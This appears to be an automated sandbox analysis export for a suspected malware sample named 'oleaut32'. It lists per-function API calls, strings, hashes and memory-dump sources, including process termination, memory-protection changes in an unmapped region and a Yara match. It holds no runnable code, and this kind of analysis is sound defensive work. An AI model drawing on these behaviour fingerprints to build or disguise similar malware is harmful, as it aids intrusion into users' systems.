                                    • Instruction ID: affa38bc1eb5f0fd5749b03f1417e1fb464e194ef1bd6555a84b7e3c49497071
                                    • Opcode Fuzzy Hash: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
                                    • Instruction Fuzzy Hash: C741A371508301ABE720CF25C845BEB77E8ABC8744F044D2EF88993291E778A955CB9A
                                    APIs
                                    • QueryFullProcessImageNameW.KERNEL32 ref: 0040E4F3
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0040E536
                                    • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 0040E577
                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,00000000,00000000), ref: 0040E594
                                    • wsprintfW.USER32 ref: 0040E5C3
                                    • VerQueryValueW.VERSION(00000000,?,?,?,?,?,00000000,00000000), ref: 0040E5DC
                                    • _wcsncpy.LIBCMT ref: 0040E652
                                    Strings
                                    • \VarFileInfo\Translation, xrefs: 0040E58E
                                    • \StringFileInfo\%04X%04X\FileDescription, xrefs: 0040E5BD
                                    • QueryFullProcessImageName, xrefs: 0040E4FD
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: Query$FileInfoValueVersion$ErrorFormatFullImageLastMessageNameProcessSize_wcsncpywsprintf
                                    • String ID: QueryFullProcessImageName$\StringFileInfo\%04X%04X\FileDescription$\VarFileInfo\Translation
                                    • API String ID: 3020331544-1601958718
                                    • Opcode ID: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction ID: eaa9ef88b69fa93d3b711ac30ff6fc1bf7e9ecaf4ef91606315cd00198441a56
                                    • Opcode Fuzzy Hash: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction Fuzzy Hash: F14119725043016BD324EB22DC45FBB73E8AF98744F444D3EF849922D1EA79D908C76A
                                    APIs
                                    • SetLastError.KERNEL32(0000007F), ref: 020D14DB
                                    • SetLastError.KERNEL32(0000007F), ref: 020D1507
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928404757.00000000020D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020D1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_20d1000_oleaut32.jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: dbc29a1ff75e0ad2a2a1d20f98984f0798f7d3532a2cd136c988fffeafccbcc3
                                    • Instruction ID: bf8835efad1eb6c7d86bd4cf30fb949eb3bd146d8f614a361f33110ff607e7c9
                                    • Opcode Fuzzy Hash: dbc29a1ff75e0ad2a2a1d20f98984f0798f7d3532a2cd136c988fffeafccbcc3
                                    • Instruction Fuzzy Hash: 5B71E474E05309EFDB08DF94C590BADB7B2BF48304F6485A8D91AAB385D734AA41DF90
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess__wcsdup_memset
                                    • String ID: D
                                    • API String ID: 169418676-2746444292
                                    • Opcode ID: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction ID: 0b47bd45ec23967565d9eba1f3cace27cbad009f0a552ed0d82179670a4d4d1e
                                    • Opcode Fuzzy Hash: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction Fuzzy Hash: DB0167B15043006BD310EF69CD41B8B7BE9AF88B40F40891EF659D7240E7B9D9448B97
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041BDC8,00000008,00413909,00000000,00000000,?,?,00413936,?,00410F75,?,?,00412311,?,?), ref: 00413812
                                    • __lock.LIBCMT ref: 00413846
                                      • Part of subcall function 00414855: __mtinitlocknum.LIBCMT ref: 0041486B
                                      • Part of subcall function 00414855: __amsg_exit.LIBCMT ref: 00414877
                                      • Part of subcall function 00414855: EnterCriticalSection.KERNEL32(?,?,?,0041384B,0000000D), ref: 0041487F
                                    • InterlockedIncrement.KERNEL32(0041D6E0), ref: 00413853
                                    • __lock.LIBCMT ref: 00413867
                                    • ___addlocaleref.LIBCMT ref: 00413885
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                    • String ID: KERNEL32.DLL
                                    • API String ID: 637971194-2576044830
                                    • Opcode ID: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction ID: 08fdddae76046f13a4609d0da6d3235dc21c8c00c6474d33689b1c42df5d2c84
                                    • Opcode Fuzzy Hash: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction Fuzzy Hash: 2D016171941B00DBD720AF66D8067C9BBE0AF50329F20851FE499966A0CBB8A6C4CB19
                                    APIs
                                    • __getptd.LIBCMT ref: 00412B53
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412B64
                                    • __getptd.LIBCMT ref: 00412B72
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: MOC$RCC$csm
                                    • API String ID: 803148776-2671469338
                                    • Opcode ID: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction ID: 0f2876ffef59d3c6b375385131f6e652370e27b5964fd21b7b7078cf082998b9
                                    • Opcode Fuzzy Hash: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction Fuzzy Hash: 9AE0ED359186088EC724AF69C18ABE933A5EB44319F1510A7A44DCB223D7ACEAE0854A
                                    APIs
                                    • GetCurrentProcess.KERNEL32(?,00100000,00000001,00000000), ref: 005E9F75
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 005E9F78
                                    • GetCurrentProcess.KERNEL32(00000000), ref: 005E9F7B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928249226.00000000005E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: true
                                    • Associated: 00000001.00000002.2928235869.00000000005E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000001.00000002.2928268334.00000000005ED000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_5e0000_oleaut32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess
                                    • String ID: :3K0$K<n(
                                    • API String ID: 2050909247-2412546189
                                    • Opcode ID: 2a400eb4ca6dd679954ed866cc09f4f32df3d1c5ff7ae4fc4b214b8c6f504fd4
                                    • Instruction ID: fc7dc7e6160d8d2ed259b3eedd01e5963c26b5b32f13cfe909b8cb4872b6f47b
                                    • Opcode Fuzzy Hash: 2a400eb4ca6dd679954ed866cc09f4f32df3d1c5ff7ae4fc4b214b8c6f504fd4
                                    • Instruction Fuzzy Hash: 1AB1B270B043C58BCB1CEF768989A2A7BA6BBD4740F144859F5C9CB391DA34DD0587A2
                                    APIs
                                    • __CreateFrameInfo.LIBCMT ref: 00412E0C
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106A8
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106B6
                                    • __getptd.LIBCMT ref: 00412E16
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412E24
                                    • __getptd.LIBCMT ref: 00412E32
                                    • __getptd.LIBCMT ref: 00412E3D
                                    • _CallCatchBlock2.LIBCMT ref: 00412E63
                                      • Part of subcall function 0041073F: __CallSettingFrame@12.LIBCMT ref: 0041078B
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F27
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                    • String ID:
                                    • API String ID: 1602911419-0
                                    • Opcode ID: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction ID: 7569b259fc3e624cf5a97b96a7300a54ad765ced98981fdc73afb8e83ec2d13a
                                    • Opcode Fuzzy Hash: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction Fuzzy Hash: C011E4B5D002099FDB00EFA5D986BED7BB0FF04315F10806AF854AB251DB789A919F58
                                    APIs
                                    • __getptd.LIBCMT ref: 00414EBC
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __amsg_exit.LIBCMT ref: 00414EDC
                                    • __lock.LIBCMT ref: 00414EEC
                                    • InterlockedDecrement.KERNEL32(?), ref: 00414F09
                                    • _free.LIBCMT ref: 00414F1C
                                    • InterlockedIncrement.KERNEL32(02181660), ref: 00414F34
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                    • String ID:
                                    • API String ID: 3470314060-0
                                    • Opcode ID: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction ID: 34fd155b25c25adfe3620824084a2b0933ecb3f9ce2fde051769732d93a5196a
                                    • Opcode Fuzzy Hash: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction Fuzzy Hash: 6F015B79E00721ABD711EF669805BDA7760BB44725F15801BE804A7391CB6CAEC2CBDD
                                    APIs
                                    • ___BuildCatchObject.LIBCMT ref: 004131A4
                                      • Part of subcall function 004130FF: ___BuildCatchObjectHelper.LIBCMT ref: 00413135
                                    • _UnwindNestedFrames.LIBCMT ref: 004131BB
                                    • ___FrameUnwindToState.LIBCMT ref: 004131C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                    • String ID: csm$csm
                                    • API String ID: 2163707966-3733052814
                                    • Opcode ID: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction ID: 9332ba3ff9db4df31153ad81b7ccdad3367009c071c3dcb25a55caf6b99e68f4
                                    • Opcode Fuzzy Hash: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction Fuzzy Hash: 6001FB7100110ABBDF126F51CC46EEB7F6AEF08355F044016BD1855121DB7AD9F1DBA9
                                    APIs
                                    • __getptd.LIBCMT ref: 0041563D
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00415654
                                    • __amsg_exit.LIBCMT ref: 00415662
                                    • __lock.LIBCMT ref: 00415672
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00415686
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    • Opcode ID: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction ID: e348e55c111b0dd0511f345811d13424c8a431ddd757bbd9f2e15d6ba2996f08
                                    • Opcode Fuzzy Hash: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction Fuzzy Hash: CBF09676940B10DBD721BB7698027CD3790AF40729F54411FF5489A2D6CB6C49C1CA9D
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
                                    • Instruction ID: 9f36e5016d7a42e12b889a531ce412ab75a6dd073b82eecd34aa996bae1b5947
                                    • Opcode Fuzzy Hash: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
                                    • Instruction Fuzzy Hash: CA11827111830196C734AB599852BFBB3E8EFC4358F144C3EE886C3691FA7C940983AB
                                    APIs
                                    • GetLastError.KERNEL32 ref: 0040E18D
                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    • WARNING: %s failed with error %d (%s), xrefs: 0040E1F4
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID: WARNING: %s failed with error %d (%s)
                                    • API String ID: 3479602957-1953342023
                                    • Opcode ID: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction ID: 71bfe3ff1a5da696a3addf6ac62f14f1fc4c04e671a446e7e169288bb51f98c2
                                    • Opcode Fuzzy Hash: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction Fuzzy Hash: 1201267160430066E7249B12DC86BFB3BA9EF8A710F504C3AF555CA1D0E6749890C29E
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction ID: 51d71b27c4b37dd042226c9a40541835d3d141334fbcb817b22f35dada8c7e80
                                    • Opcode Fuzzy Hash: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction Fuzzy Hash: 1C01527110830196C734AB589852BFBB3E9EFC4354F044D3EF986C3681EA3C944887AB
                                    APIs
                                    • OpenProcess.KERNEL32(00000401,00000000,?), ref: 0040E6C6
                                      • Part of subcall function 0040E2A0: OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                      • Part of subcall function 0040E2A0: CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • TerminateProcess.KERNEL32(00000000,00000009), ref: 0040E6EE
                                    • CloseHandle.KERNEL32(00000000), ref: 0040E6FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: Process$CloseHandleOpen$TerminateToken
                                    • String ID: SYSTEM
                                    • API String ID: 1755933052-968218125
                                    • Opcode ID: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction ID: 8e2cb8a182e1328e513b3a34ec3bf5da011a535263a81edc7ae68b639948cf14
                                    • Opcode Fuzzy Hash: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction Fuzzy Hash: C2F06275A0131067D330AB16AC0DFDB3FA8DBC9B10F418529F959E3282DA38880186AA
                                    APIs
                                    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 020D21F9
                                    • SetLastError.KERNEL32(0000007E), ref: 020D223B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928404757.00000000020D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020D1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_20d1000_oleaut32.jbxd
                                    Similarity
                                    • API ID: ErrorHugeLastRead
                                    • String ID:
                                    • API String ID: 3239643929-0
                                    • Opcode ID: 008c14ab15292aa2fd5f935fe55e05e6104900feb7a0ed30ad003f2f1d00d8fb
                                    • Instruction ID: 620ff548b256232dfc0631cea476320ce7075829434ff3b47c8cb035369f3c23
                                    • Opcode Fuzzy Hash: 008c14ab15292aa2fd5f935fe55e05e6104900feb7a0ed30ad003f2f1d00d8fb
                                    • Instruction Fuzzy Hash: A381A874A01309EFDB44CF94C994BAEBBB1FF88314F148198E909AB355C774AA81DF91
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041589E
                                    • __isleadbyte_l.LIBCMT ref: 004158D1
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00415902
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00415970
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction ID: 1bfa8a3c802f93689ab76b22000e8837c631d4e9b9b80ec41d52cc0f2dacea33
                                    • Opcode Fuzzy Hash: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction Fuzzy Hash: CE31D271A10646EFDB20EF64C880AEE3BB5FF81320F14856AE4659B2A1D334DDD0DB59
                                    APIs
                                    • _free.LIBCMT ref: 004167A8
                                      • Part of subcall function 0041025B: __FF_MSGBANNER.LIBCMT ref: 00410274
                                      • Part of subcall function 0041025B: __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 0041025B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928104059.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928118061.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000001.00000002.2928134425.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_400000_oleaut32.jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction ID: 3c08702fd25ada2266926da53e5058be595d777b16bfef6a83bfe969bb48a588
                                    • Opcode Fuzzy Hash: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction Fuzzy Hash: 6211EB32501611ABDB213FB5BC15ADA3794AF44378B21843BF869962A0DB3DCCC1869C
                                    APIs
                                    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 020D2468
                                    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 020D24B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928404757.00000000020D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020D1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_20d1000_oleaut32.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: @
                                    • API String ID: 544645111-2766056989
                                    • Opcode ID: 093391c2c66afd646e511b9a203468c332010d596d7c9c0286f6b026c9d59a69
                                    • Instruction ID: 8ce14dfec83e87b7b250ca3dc2cf2df4c47f49a64fe8439e3f45821a84961411
                                    • Opcode Fuzzy Hash: 093391c2c66afd646e511b9a203468c332010d596d7c9c0286f6b026c9d59a69
                                    • Instruction Fuzzy Hash: 5F21A8B4D06309EFDB14CF94C984BAEBBB5BF44304F108599ED05A7245C774AA80EB55
                                    APIs
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 004106F3
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 00410703
                                    • __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412F27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.2928085310.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.2928068926.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
